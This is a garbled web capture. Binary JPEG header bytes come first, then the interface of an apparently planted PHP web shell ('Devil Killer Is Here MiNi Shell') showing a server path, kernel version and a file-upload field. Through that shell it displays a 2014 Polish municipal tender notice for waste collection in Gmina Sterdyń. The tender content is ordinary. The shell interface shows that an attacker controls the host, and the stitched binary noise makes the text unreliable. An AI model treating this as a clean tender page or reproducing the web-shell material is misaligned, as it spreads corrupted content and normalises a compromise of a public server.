JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140527/178774-N-2014.html

<p class="kh_header"><b>Sterdyń-Osada: Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Sterdyń z nieruchomości na których zamieszkują mieszkańcy</b><br>
<b>Numer ogłoszenia: 178774 - 2014; data zamieszczenia: 27.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sterdyń , ul. T. Kościuszki 6, 08-320 Sterdyń-Osada, woj. mazowieckie, tel. 0-25 7870004, faks 0-25 7870004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sterdyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Sterdyń z nieruchomości na których zamieszkują mieszkańcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. CHARAKTERYSTYKA GMINY STERDYŃ:

1) Powierzchnia
Powierzchnia Gminy Sterdyń wynosi ok. 13 000 ha,  tj. 30 sołectw.

2) Liczba mieszkańców
Ogólna liczba mieszkańców zamieszkałych na 30.04.2014 r. - 3 528 osób   
a) w zabudowie wielorodzinnej - 61 osób,
b) w zabudowie jednorodzinnej - 3 467 osób.

3) Liczba właścicieli nieruchomości  
 a) w zabudowie wielorodzinnej  - 2 budynki,
 b) w zabudowie jednorodzinnej  - 1 320 właścicieli nieruchomości.

      2.  INFORMACJE O ODEBRANYCH ODPADACH Z TERENU GMINY STERDYŃ 
           W 2013 R WG INFORMACJI PRZEDSIĘBIORCÓW:
            odpady zmieszane (20 03 01)                                           -                     180,96 Mg,
            inne odpady nie ulegające biodegradacji (20 02 03)         -                        3,55 Mg,
            odpady  wielkogabarytowe (20 03 07)                              -                      13,68 Mg,
            papier  i tektura (15 01 01 i 20 01 01)                               -                        7,42 Mg,
            szkło (15 01 07),(20 01 02);                                              -                      31,55 Mg,
            tworzywa sztuczne (15 01 02), (20 01 39);                       -                      14,72 Mg,
            zużyty sprzęt elektryczny i elektroniczny                         -                         0,00 Mg                                                                                                                                      

     3. PRZEDMIOTEM ZAMÓWIENIA JEST :
           1) Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Sterdyń
    z nieruchomości na których zamieszkują mieszkańcy:
             a)  niesegregowane zmieszane odpady komunalne o kodzie     -  (20 03 01)
             b)  odpady zbierane w sposób selektywny:
                      - papier (15 01 01),(20 01 01);
                      - metale (15 01 04), ( 20 01 40);
                      - tworzywa sztuczne (15 01 02), (20 01 39);
                      - szkło (15 01 07),(20 01 02);
                      - opakowania wielomateriałowe (15 01 05);
                      - odpady komunalne ulegające biodegradacji, w tym odpady opakowaniowe ulegające
                         biodegradacji (15 01 01 i 20 02 01); 
                      -  odpady zielone (20 02 01) ;                     
                      - zużyty sprzęt elektryczny i elektroniczny(20 01 35),(20 01 36),(20 01 23);
                      - meble i inne odpady wielkogabarytowe (20 03 07);
                      - zużyte opony (16 01 03);     
             2)  Osiągnięcie odpowiednich  poziomów recyklingu, przygotowania  do ponownego
                   użycia i odzysku innymi metodami oraz ograniczenie masy odpadów  komunalnych
                   ulegających biodegradacji przekazywanych do składowania, zgodnie  z zapisami
                   ustawy z dnia 13września 1996 r. o utrzymaniu czystości i porządku w gminach
                  (Dz.U.z 2013 r. poz. 1399 ze zm.) określonych w Rozporządzeniu Ministra Środowiska
                   z dnia  29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego
                   użycia  i  odzysku  innymi metodami niektórych frakcji odpadów komunalnych(Dz.U.z
                   2012 r.poz.645)oraz osiągnięcie poziomów określonych w Rozporządzeniu Ministra
                  Środowiska  z dnia   25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów
                  komunalnych  ulegających biodegradacji przekazywanych do składowania oraz sposobu
                  obliczania poziomu  ograniczenia  masy tych odpadów  (Dz. U. z 2012 r. poz. 676).   
                          
     4.  URZĄDZENIA, SPOSÓB I CZĘSTOTLIWOŚĆ ODBIORU ODPADÓW 

           1) Zabudowa wielorodzinna;
                a) niesegregowane  (zmieszane) odpady komunalne (kod 20 03 01)
                    - 1 kontener KP- 7 odbierany będzie na zgłoszenie  zarządcy nieruchomości  lub
                       pracownika Urzędu Gminy w terminie 2 dni od dnia zgłoszenia ;
                b) selektywna zbiórka odpadów komunalnych odbywać się będzie do
                     specjalistycznych pojemników  o pojemności  1100 l zaopatrzonych w specjalne
                     (małe) otwory wrzutowe:
                      - pojemnik na szkło kolor zielony, lub pojemnik  z napisem Szkło - 1 szt.;
                      - pojemnik na tworzywa sztuczne kolor żółty, lub pojemnik z napisem Plastik- 1szt.;
                         w okresie od maja do października 2 szt.
                      - pojemnik na papier i opakowania wielomateriałowe kolor niebieski  lub pojemnik 
                         z napisem   Papier - 1 szt.,
                      - pojemnik na metal kolor czerwony, lub pojemnik z napisem Metal
                         lub kontener KP-7 przystosowany do segregacji odpadów  i jeden pojemnik.
                    odbierane będą na zgłoszenie zarządcy nieruchomości  lub pracownika Urzędu Gminy
                    w terminie 2 dni od dnia zgłoszenia ;
                c) pojemniki zapewnia Wykonawca i ustawia je w miejscu wskazanym  przez
                    Zarządcę nieruchomości.

          2) Zabudowa jednorodzinna:
               a) niesegregowane zmieszane odpady komunalne gromadzone będą w workach
                   czarnych  o pojemności 120 l lub pojemnikach o pojemności  240 l ;
                 - worki lub pojemniki zapewni Wykonawca i przekaże je lub ustawi  w miejscach
                   wskazanych przez właścicieli nieruchomości;
                 - w przypadku zaopatrzenia właścicieli nieruchomości w worki przewiduje się: 1 worek
                    czarny na  gospodarstwo 1- 2 osobowe, 2 worki czarne na gospodarstwo powyżej  
                    3 osób.  
                    Właściciele nieruchomości będą mogli  także wykorzystać własne  pojemniki oraz
                     worki bez logo firmy.  
                    Częstotliwość odbioru  przez Wykonawcę odpadów jeden raz na miesiąc. 
              b) selektywnie zbierane odpady komunalne  gromadzone będą w workach  o pojemności
                  od 60 do 120 l  lub  pojemnikach  240 l;
                - worek, pojemnik  niebieski na papier i opakowania wielomateriałowe lub inny 
                  z napisem papier, 
                - worek, pojemnik  żółty na tworzywa sztuczne lub inny z napisem plastik,
                - worek,pojemnik  zielony na szkło, lub inny z napisem szkło,
                - worek, pojemnik  czerwony na metal, lub inny z napisem metal,
                - lub inne worki  przezroczyste z możliwością określenia rodzaju posegregowanego
                  odpadu.
                - worki kolorowe zapewnia Wykonawca.
Właściciele nieruchomości będą mogli  także wykorzystać własne  pojemniki oraz worki bez logo firmy.
Ponad połowę gospodarstw domowych wyposażonych jest w pojemniki do segregacji odpadów. Docelowo w II półroczu br. zakłada się,że będzie wyposażonych ponad 70% gospodarstw domowych.
Częstotliwość odbioru  przez Wykonawcę odpadów  raz na dwa miesiące.

Wykonawca zobowiązany jest do odbierania wszystkich odpadów komunalnych zgromadzonych 
w pojemnikach lub w workach, wytwarzanych na terenie wszystkich nieruchomości tj. zabudowy zwartej,zabudowy kolonijnej, pojedynczych posesji w zabudowie kolonijnej -  na których zamieszkują mieszkańcy.
Przy każdorazowym  odbiorze worków z odpadami  z każdego punktu odbioru  Wykonawca odbierający odpady zobowiązany jest do pozostawienia tej  samej ilości worków danego rodzaju 
co odebrał.
 
3) Wspólnie dla zabudowy wielorodzinnej i jednorodzinnej 

               a) odpady wielkogabarytowe oraz zużyty  sprzęt elektryczny i elektroniczny, będą
 odbierane od właścicieli nieruchomości, z przed ich nieruchomości w terminach
               określonych  przez Wykonawcę  w  harmonogramie. 
               Częstotliwość odbioru odpadów - 2 razy do roku (jeden termin na wiosnę drugi termin
                  na jesieni).
            b) zużyte opony 
               będą odbierane od właścicieli nieruchomości z przed ich nieruchomości,jeden raz w roku,
               w terminie określonym  przez Wykonawcę  w  harmonogramie. 
            c) odpady budowlane:
                odbieranie odpadów  budowlanych i remontowych nie jest przedmiotem niniejszego
                zamówienia. W wypadku stwierdzenia przez pracowników Wykonawcy bezpośrednio
                dokonujących odbioru odpadów zapełnienia pojemnika lub worka służącego do
                gromadzenia odpadów  segregowanych odpadami budowlanymi lub remontowymi
                Wykonawca nie ma obowiązku odbioru tych odpadów.
          d) odpady komunalne ulegające biodegradacji w tym odpady opakowaniowe ulegające
               biodegradacji,odpady zielone z ogrodów, będą odbierane w okresie kwiecień - wrzesień 
               z częstotliwością co drugi miesiąc w terminach określonych w harmonogramie odbioru
               odpadów.

       4)  Szacunkowa ilość urządzeń do gromadzenia odpadów oraz rodzaj wymaganego 
             sprzętu technicznego:

          a) liczba i rodzaj pojemników do gromadzenia odpadów zmieszanych o poszczególnych
               pojemnościach;
              -  worki koloru czarnego  odpowiedniej jakości  o pojemności  120 l  - ok. 25 000 szt.  lub
                pojemniki  240  l - ok. 1 100 szt.
         b)  liczba worków do selektywnej zbiórki odpadów o pojemności od 60 do 120 l :
               kolor zielony -       ok.  10 000 szt.
               kolor żółty     -       ok.  10 000 szt
               kolor niebieski  -    ok.   6 000 szt.  
               kolor czerwony -    ok.   6 000 szt.
               -  grubość dostosowana do rodzaju danego odpadu;
               -  nadruk jednostronny, kolor czarny w treści:logo firmy odbierającej odpady oraz
              informacja dotycząca rodzaju odpadu gromadzonego w worku.
         c)  sprzęt techniczny:
               - minimum 2 pojazdy przystosowane do odbierania zmieszanych  odpadów komunalnych, 
               - minimum 2 pojazdy przystosowane  do odbierania selektywnie zebranych odpadów
                  komunalnych, 
               - minimum1 pojazd do odbierania odpadów bez funkcji kompaktującej.
              ( pojazdy  w pełni  sprawne technicznie z aktualnymi badaniami technicznymi )

       
    5. TERMIN WYKONANIA ZAMÓWIENIA :  od dnia 1 lipca 2014 r. do 30 czerwca 2015 r.     

    6.   OBOWIĄZKI  WYKONAWCY:

     1) Wykonawca zobowiązany jest do przestrzegania obowiązujących w trakcie trwania
          umowy  przepisów prawnych: 
            a) dyrektywy Parlamentu Europejskiego i Rady 2008/98/WE  z dnia  19 listopada 2008 r. w
                sprawie odpadów oraz uchylającej niektóre dyrektywy (Dz.U.UE.L 2008.312.3);
            b)  ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U.
                  z 2013 r. poz.1 399 ze zm.);
c)  ustawy z dnia 14 grudnia 2012 o odpadach (Dz.U. z 2013 r. poz.21);
d)  rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów
     sprawozdań o odebranych odpadach komunalnych,odebranych nieczystościach  ciekłych
     oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz.U. z 2012 r.
      poz.630);
e)  rozporządzenia Ministra Środowiska z dnia 11 września 2012 r. w sprawie
      mechaniczno - biologicznego przetwarzania zmieszanych odpadów komunalnych
     (Dz.U. z 2012 poz.1052);
f)  rozporządzeniu Ministra Środowiska z dnia   25 maja 2012 r. w sprawie  poziomów
       ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych
       do składowania oraz sposobu obliczania poziomu ograniczenia  masy tych odpadów
      (Dz. U. z 2012 r. poz. 676);
g)   rozporządzeniu Ministra Środowiska z dnia  29 maja 2012 r. w sprawie  poziomów
       recyklingu, przygotowania do ponownego użycia i  odzysku  innymi metodami
       niektórych frakcji odpadów komunalnych (Dz.U. z 2012 r. poz.645 );
h)   rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r.  w sprawie
      szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli
      nieruchomości(Dz.U. z 2013 r.,poz.122);
i)  Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017
       z uwzględnieniem lat 2018 - 2023   przyjętym uchwałą Sejmiku Województwa
       Mazowieckiego Nr 211/12 z dnia  22.10.2012 r.;
j)  uchwały Nr 212/12 z dnia 22.10.2012 r.  w sprawie wykonania  Wojewódzkiego Planu
       Gospodarki Odpadami dla  Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018 -
       2023;
k)  regulaminu utrzymania czystości i porządku  na terenie Gminy Sterdyń przyjętego
       uchwałą  Nr XIX /121/12 Rady Gminy Sterdyń z dnia 27 grudnia 2012 r. ze zm.;
l)  uchwały Nr XIX/120/12 Rady Gminy Sterdyń z dnia 27 grudnia 2012 r. w sprawie
       określenia szczegółowego sposobu  i zakresu świadczenia usług  w zakresie odbierania
       odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych
       odpadów w zamian za uiszczoną przez właściciela nieruchomości opłatę za    gospodarowanie odpadami komunalnymi z terenu  Gminy Sterdyń.
ł)  ustawy z dnia 29 sierpnia 1991 r. o ochronie danych osobowych (Dz.U. 2002 r. Nr 101,    poz.926 ze zm.);
m)  innych aktów normatywnych obowiązujących na obszarze Gminy Sterdyń.   

      2. Wykonawca  odpowiada za informowanie mieszkańców o zasadach i terminach
           odbierania poszczególnych rodzajów odpadów. W tym celu sporządza harmonogram
           odbioru (przynajmniej na okres pół roku), który zostanie podany do publicznej
           wiadomości  na stronie internetowej Gminy oraz Wykonawca zaopatrzy w nie
            mieszkańców Gminy przed dniem 30 czerwca 2014 r. i przed 31 grudnia 2014 r.
           
     3. Wykonawca ma obowiązek wyposażenia właścicieli zamieszkałych nieruchomości 
        w terminie do  dnia  30  czerwca 2014 r.:
       1) w pojemniki lub worki na odpady zmieszane i w worki do segregacji odpadów.
          Na potwierdzenie dostarczenia pojemników lub worków na odpady zmieszane i odpady
          segregowane Wykonawca przedłoży Zamawiającemu potwierdzenia od właścicieli
           nieruchomości opatrzone datą przekazania i podpisem właściciela bądź jego przedstawiciela.
           W przypadku niemożności spełnienia tego warunku z przyczyn niezależnych od Wykonawcy
           wskaże on Zamawiającemu te przyczyny na piśmie i udokumentuje ich zaistnienie.  Za
           przyczyny niezależne od Wykonawcy można będzie uznać w szczególności co najmniej
           trzykrotne niezastanie właściciela nieruchomości pod wskazanym adresem w odstępach co
            najmniej 3 dniowych w godzinach 7.00-20.00.
       2) w kontener KP 7 - na odpad zmieszany i pojemniki o pojemności 1100 l  lub 
           kontener KP- 7 przystosowany do segregacji odpadów. Wykonawca przedłoży
           Zamawiającemu potwierdzenie od zarządcy nieruchomości opatrzone datą przekazania 
           i  podpisem. W przypadku niemożności spełnienia tego warunku z przyczyn niezależnych od
           Wykonawcy wskaże on Zamawiającemu te przyczyny na piśmie i udokumentuje ich
            zaistnienie.       
      3) w trakcie wykonywania umowy wyposażenie nowych zgłoszonych przez Zamawiającego
          miejsc gromadzenia odpadów w niezbędne pojemniki lub worki następuje najpóźniej w
         ciągu 3 dni  roboczych  na zasadach opisanych w ust.3.
      4)  Wykonawca jest zobowiązany do zebrania także odpadów leżących obok  pojemników lub
          worków jeśli jest to wynikiem jego działalności.
      5) Wykonawca będzie przekazywał sprawozdania z wykonywanych usług zgodnie z ustawą
           o utrzymaniu czystości i porządku w gminach.
      6) Zamawiający nie ponosi odpowiedzialności za pojemniki na odpady przekazane 
           w użytkowanie właścicielom  nieruchomości.
      7) za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru
          odpadów odpowiedzialność ponosi Wykonawca.
      8) odpady zebrane od właścicieli nieruchomości z terenu Gminy Sterdyń Wykonawca
           zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu) zgodnie 
           z obowiązującym prawem, w tym zmieszane odpady komunalne, odpady ulegające
          biodegradacji oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do
          składowania przekazywać do regionalnych instalacji do przetwarzania odpadów
          komunalnych, oraz przedstawić  Zamawiającemu jeden raz na miesiąc dowody
          potwierdzające wykonanie tych czynności, tj. karty przekazania odpadów.          
      9)  Wykonawca zobowiązany jest do informacji na bieżąco Zamawiającego  
          o nieruchomościach, w których nie jest prowadzona segregacja odpadów, odpady są
          nieodpowiednio segregowane oraz wystawiane są nadmierne  ilości  odpadów
          niesegregowanych. 
     10) Wykonawca przekazuje Zamawiającemu bieżące informacje o adresach nieruchomości, 
          na których zamieszkują mieszkańcy i powstają odpady komunalne, a nie ujętych w bazie
          danych prowadzonej  przez Zamawiającego.
     11)  Wykonawca jest zobowiązany do prowadzenia kart ewidencji odpadów zgodnie
            z obowiązującymi przepisami.
     12) Wykonawca przedstawi Zamawiającemu wykaz telefonów do kontaktów roboczych
            z uwzględnieniem łączności bezprzewodowej niezbędnej do prawidłowej realizacji usługi,
           oraz udostępni możliwość podglądu trasy pojazdów odbierających  odpady.
     13) Wykonawca ponosi odpowiedzialność wobec  Zamawiającego i osób trzecich za szkody na
            mieniu i zdrowiu osób  trzecich,powstałe podczas i w związku z realizacją przedmiotu
            umowy w zakresie określonym w Kodeksie Cywilnym i innych ustawach. 
     14)  Zamówienie nie obejmuje odbierania odpadów komunalnych od właścicieli nieruchomości,
            na których nie zamieszkują mieszkańcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium w wysokości 6.000,00zł (słownie: sześć tysięcy złotych 00/100)  
do 	dnia 05-06-2014 r. godz. 10:00. 
2. Wadium powinno być wniesione w wybranej przez wykonawcę formie zgodnie z art. 45 ust. 6 ustawy Prawo Zamówień Publicznych 
3. W przypadku wnoszenia wadium w formie pieniądza wymaganą kwotę należy wpłacić na konto Zamawiającego na rachunek bankowy Nr  11 9221 0000 0020 0716 2000 0040; PBS Sokołów Podlaski Oddział Sterdyń. 
4. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach - dokument wadium należy złożyć w kasie Urzędu Gminy Sterdyń (pokój nr 3), zaś kserokopię potwierdzoną za zgodność do oferty.
5. Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości 
i formie skutkuje wykluczeniem Wykonawcy z postępowania. 
6. Zgodnie z art. 46 ust. 4a ustawy Prawo zamówień publicznych w przypadku nieuzupełnienia oferty w terminie wskazanym w wezwaniu do jej uzupełnienia wadium przepada na rzecz Zamawiającego.
7. Zwrot wadium nastąpi zgodnie z warunkami określonymi w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust. 1 pkt 1 ustawy) tj. wykonawca musi posiadać wpis do Rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Sterdyń, zezwolenie na prowadzenie działalności w zakresie transportu odpadów wydane przez właściwy organ oraz spełniać warunki rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, W celu oceny spełniania warunku należy przedłożyć: oświadczenie stanowiące załącznik nr 1 do specyfikacji, zaświadczenie o wpisie do Rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Sterdyń, zezwolenie właściwego organu na prowadzenie działalności w zakresie transportu odpadów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności na kwotę nie niższą niż 200.000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

